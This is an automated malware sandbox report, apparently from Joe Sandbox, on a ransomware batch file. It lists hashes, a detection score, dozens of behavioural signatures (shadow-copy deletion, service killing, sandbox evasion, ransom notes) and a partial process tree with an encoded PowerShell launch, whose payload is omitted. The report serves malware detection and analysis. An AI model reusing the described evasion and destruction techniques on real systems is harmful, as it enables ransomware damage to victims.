Windows
Analysis Report
R1TftmQpuQ.bat
Overview
General Information
Sample name: | R1TftmQpuQ.bat (renamed because original name is a hash value) |
Original sample name: | 3B8A2BCD9E8DD805793CC95C74D30F20EBC5714EA249D165AFAC29D1F3B0ACE0.bat |
Analysis ID: | 1611767 |
MD5: | 659dc2c8af5180c5465f0e04e7334aed |
SHA1: | a3e075c9d36c0077471f7034696af4c660630d9b |
SHA256: | 3b8a2bcd9e8dd805793cc95c74d30f20ebc5714ea249d165afac29d1f3b0ace0 |
Tags: | bat, user-lighting9999 |
Infos: | |
Detection
Targeted Ransomware
Score: | 100 |
Range: | 0 - 100 |
Confidence: | 100% |
Signatures
Found ransom note / readme
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Kill multiple process
Sigma detected: Stop multiple services
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected RansomwareGeneric
Yara detected Targeted Ransomware
.NET source code contains potential unpacker
Creates files in the recycle bin to hide itself
Deletes shadow drive data (may be related to ransomware)
Disables security and backup related services
Encrypted powershell cmdline option found
Excessive usage of taskkill to terminate processes
Found large BAT file
Joe Sandbox ML detected suspicious sample
May disable shadow drive data (uses vssadmin)
Opens network shares
Powershell is started from unusual location (likely to bypass HIPS)
Reads the Security eventlog
Reads the System eventlog
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Shadow Copies Deletion Using Operating Systems Utilities
Sigma detected: Silenttrinity Stager Msbuild Activity
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious Executable File Creation
Sigma detected: Suspicious Windows Service Tampering
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses attrib.exe to hide files
Uses bcdedit to modify the Windows boot settings
Writes a notice file (html or txt) to demand a ransom
Writes many files with high entropy
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for available system drives (often done to infect USB drives)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Sigma detected: Suspicious Execution of Powershell with Base64
Stores files to the Windows start menu directory
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses net.exe to stop services
Uses taskkill to terminate processes
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
cmd.exe (PID: 6204 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\R1TftmQpuQ.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
conhost.exe (PID: 7132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
attrib.exe (PID: 5892 cmdline: attrib +s +h "C:\Users\user\Desktop\R1TftmQpuQ.bat".exe MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
R1TftmQpuQ.bat.exe (PID: 5664 cmdline:
"C:\Users\user\Desktop\R1TftmQpuQ.bat".exe -wIn 1 -enC <base64-encoded PowerShell command, omitted>